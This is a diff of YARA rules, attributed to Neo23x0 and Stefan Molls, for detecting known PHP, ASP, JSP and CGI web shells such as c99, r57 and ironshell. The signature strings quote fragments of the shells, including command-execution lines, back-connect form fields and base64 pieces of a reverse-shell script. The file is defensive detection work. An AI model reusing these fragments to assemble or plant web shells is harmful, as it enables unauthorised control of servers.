+		1 of them
+}
+rule telnet_cgi {
+	meta:
+		description = "Semi-Auto-generated  - file telnet.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "dee697481383052980c20c48de1598d1"
+	strings:
+		$s0 = "www.rohitab.com"
+		$s1 = "W A R N I N G: Private Server"
+		$s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie"
+		$s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C"
+	condition:
+		1 of them
+}
+rule ironshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file ironshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+	strings:
+		$s0 = "www.ironwarez.info"
+		$s1 = "$cookiename = \"wieeeee\";"
+		$s2 = "~ Shell I"
+		$s3 = "www.rootshell-team.info"
+		$s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"
+	condition:
+		1 of them
+}
+rule backdoorfr_php {
+	meta:
+		description = "Semi-Auto-generated  - file backdoorfr.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "91e4afc7444ed258640e85bcaf0fecfc"
+	strings:
+		$s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan"
+		$s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc"
+	condition:
+		1 of them
+}
+rule aspydrv_asp {
+	meta:
+		description = "Semi-Auto-generated  - file aspydrv.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "1c01f8a88baee39aa1cebec644bbcb99"
+		score = 60
+	strings:
+		$s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))"
+		$s1 = "password"
+		$s2 = "session(\"shagman\")="
+	condition:
+		2 of them
+}
+rule cmdjsp_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file cmdjsp.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b815611cc39f17f05a73444d699341d4"
+	strings:
+		$s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
+		$s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+		$s2 = "cmdjsp.jsp" 
+		$s3 = "michaeldaw.org" fullword
+	condition:
+		1 of them
+}
+rule h4ntu_shell__powered_by_tsoi_ {
+	meta:
+		description = "Semi-Auto-generated  - file h4ntu shell [powered by tsoi].txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+	strings:
+		$s0 = "h4ntu shell"
+		$s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
+	condition:
+		1 of them
+}
+rule Ajan_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Ajan.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b6f468252407efc2318639da22b08af0"
+	strings:
+		$s1 = "c:\\downloaded.zip"
+		$s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
+		$s3 = "http://www35.websamba.com/cybervurgun/"
+	condition:
+		1 of them
+}
+rule PHANTASMA_php {
+	meta:
+		description = "Semi-Auto-generated  - file PHANTASMA.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "52779a27fa377ae404761a7ce76a5da7"
+	strings:
+		$s0 = ">[*] Safemode Mode Run</DIV>"
+		$s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"
+		$s2 = "[*] Spawning Shell"
+		$s3 = "Cha0s"
+	condition:
+		2 of them
+}
+rule MySQL_Web_Interface_Version_0_8_php {
+	meta:
+		description = "Semi-Auto-generated  - file MySQL Web Interface Version 0.8.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "36d4f34d0a22080f47bb1cb94107c60f"
+	strings:
+		$s0 = "SooMin Kim"
+		$s1 = "http://popeye.snu.ac.kr/~smkim/mysql"
+		$s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"
+		$s3 = "<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi"
+	condition:
+		2 of them
+}
+rule simple_cmd_html {
+	meta:
+		description = "Semi-Auto-generated  - file simple_cmd.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c6381412df74dbf3bcd5a2b31522b544"
+	strings:
+		$s1 = "<title>G-Security Webshell</title>" fullword
+		$s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+		$s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+		$s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+	condition:
+		all of them
+}
+rule _1_c2007_php_php_c100_php {
+	meta:
+		description = "Semi-Auto-generated  - from files 1.txt, c2007.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash1 = "d089e7168373a0634e1ac18c0ee00085"
+		hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"
+	strings:
+		$s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""
+		$s3 = "echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+	condition:
+		1 of them
+}
+rule _nst_php_php_img_php_php_nstview_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+		hash1 = "17a07bb84e137b8aa60f87cd6bfab748"
+		hash2 = "4745d510fed4378e4b1730f56f25e569"
+	strings:
+		$s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i"
+		$s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v"
+		$s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input"
+	condition:
+		1 of them
+}
+rule _network_php_php_xinfo_php_php_nfm_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f"
+		hash1 = "2601b6fc1579f263d2f3960ce775df70"
+		hash2 = "401fbae5f10283051c39e640b77e4c26"
+	strings:
+		$s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa"
+		$s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''"
+	condition:
+		all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft"
+		$s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r"
+	condition:
+		1 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash3 = "8023394542cddf8aee5dec6072ed02b5"
+		hash4 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash5 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"
+		$s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"
+	condition:
+		1 of them
+}
+rule _c99shell_v1_0_php_php_c99php_SsEs_php_php_ctt_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash3 = "671cad517edd254352fe7e0c7c981c39"
+	strings:
+		$s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""
+		$s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""
+		$s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""
+	condition:
+		2 of them
+}
+rule _r577_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash2 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['"
+		$s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>"
+	condition:
+		1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php_ctt_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "09609851caa129e40b0d56e90dfc476c"
+		hash6 = "671cad517edd254352fe7e0c7c981c39"
+	strings:
+		$s0 = "  if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\""
+		$s1 = "  if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile"
+		$s2 = "  echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr"
+		$s3 = "  elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m"
+	condition:
+		all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "$sess_data[\"cut\"] = array(); c99_s"
+		$s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))"
+	condition:
+		1 of them
+}
+rule _w_php_php_wacking_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "\"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+		$s2 = "c99sh_sqlquery"
+	condition:
+		1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA"
+		$s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec"
+	condition:
+		1 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash4 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s0 = "echo sr(15,\"<b>\".$lang[$language.'_text"
+		$s1 = ".$arrow.\"</b>\",in('text','"
+	condition:
+		2 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+	strings:
+		$s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
+		$s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"
+		$s2 = "rst.void.ru" 
+	condition:
+		3 of them
+}
+rule _r577_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "8023394542cddf8aee5dec6072ed02b5"
+		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash3 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s0 = "echo ws(2).$lb.\" <a"
+		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']"
+		$s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l"
+	condition:
+		2 of them
+}
+rule _wacking_php_php_1_SpecialShell_99_php_php_c100_php {
+	meta:
+		description = "Semi-Auto-generated  - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash1 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash2 = "09609851caa129e40b0d56e90dfc476c"
+		hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"
+	strings:
+		$s0 = "if(eregi(\"./shbd $por\",$scan))"
+		$s1 = "$_POST['backconnectip']"
+		$s2 = "$_POST['backcconnmsg']" 
+	condition:
+		1 of them
+}
+rule _r577_php_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash2 = "8023394542cddf8aee5dec6072ed02b5"
+		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash4 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s1 = "if(rmdir($_POST['mk_name']))"
+		$s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>"
+		$s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell"
+	condition:
+		2 of them
+}
+rule _w_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash3 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi"
+		$s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu"
+		$s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd"
+	condition:
+		1 of them
+}
+rule _webadmin_php_php_iMHaPFtp_php_php_Private_i3lue_php {
+	meta:
+		description = "Semi-Auto-generated  - from files webadmin.php.php.txt, iMHaPFtp.php.php.txt, Private-i3lue.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "b268e6fa3bf3fe496cffb4ea574ec4c7"
+		hash1 = "12911b73bc6a5d313b494102abcf5c57"
+		hash2 = "13f5c7a035ecce5f9f380967cf9d4e92"
+	strings:
+		$s0 = "return $type . $owner . $group . $other;" fullword
+		$s1 = "$owner  = ($mode & 00400) ? 'r' : '-';" fullword
+	condition:
+		all of them
+}
+rule multiple_php_webshells {
+	meta:
+		description = "Semi-Auto-generated  - from files multiple_php_webshells"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "be0f67f3e995517d18859ed57b4b4389"
+		hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash4 = "8023394542cddf8aee5dec6072ed02b5"
+		hash5 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash6 = "817671e1bdc85e04cc3440bbd9288800"
+		hash7 = "7101fe72421402029e2629f3aaed6de7"
+		hash8 = "f618f41f7ebeb5e5076986a66593afd1"
+	strings:
+		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+		$s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0"
+		$s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg"
+	condition:
+		2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+	strings:
+		$s0 = "<b>Dumped! Dump has been writed to "
+		$s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st"
+		$s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive"
+	condition:
+		1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+	strings:
+		$s0 = "@ini_set(\"highlight" fullword
+		$s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword
+		$s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword
+	condition:
+		2 of them
+}
+rule _GFS_web_shell_ver_3_1_7___PRiV8_php_nshell_php_php_gfs_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "be0f67f3e995517d18859ed57b4b4389"
+		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+		hash2 = "f618f41f7ebeb5e5076986a66593afd1"
+	strings:
+		$s2 = "echo $uname.\"</font><br><b>\";" fullword
+		$s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword
+		$s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()"
+	condition:
+		2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "c99ftpbrutecheck"
+		$s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword
+		$s2 = "$fqb_lenght = $nixpwdperpage;" fullword
+		$s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword
+	condition:
+		2 of them
+}
+rule _w_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "$sqlquicklaunch[] = array(\""
+		$s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<"
+	condition:
+		all of them
+}
+rule _antichat_php_php_Fatalshell_php_php_a_gedit_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "128e90b5e2df97e21e96d8e268cde7e3"
+		hash1 = "b15583f4eaad10a25ef53ab451a4a26d"
+		hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"
+	strings:
+		$s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword
+		$s1 = "if($action==\"phpeval\"){" fullword
+		$s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword
+		$s3 = "$dir=getcwd().\"/\";" fullword
+	condition:
+		2 of them
+}
+rule _c99shell_v1_0_php_php_c99php_SsEs_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+	strings:
+		$s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword
+	condition:
+		1 of them
+}
+rule _Crystal_php_nshell_php_php_load_shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "fdbf54d5bf3264eb1c4bff1fac548879"
+		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+		hash2 = "0c5d227f4aa76785e4760cdcff78a661"
+	strings:
+		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+		$s1 = "$dires = $dires . $directory;" fullword
+		$s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword
+	condition:
+		2 of them
+}
+rule _nst_php_php_cybershell_php_php_img_php_php_nstview_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+		hash1 = "ef8828e0bc0641a655de3932199c0527"
+		hash2 = "17a07bb84e137b8aa60f87cd6bfab748"
+		hash3 = "4745d510fed4378e4b1730f56f25e569"
+	strings:
+		$s0 = "@$rto=$_POST['rto'];" fullword
+		$s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword
+		$s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword
+	condition:
+		2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_dC3_Security_Crew_Shell_PRiV_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
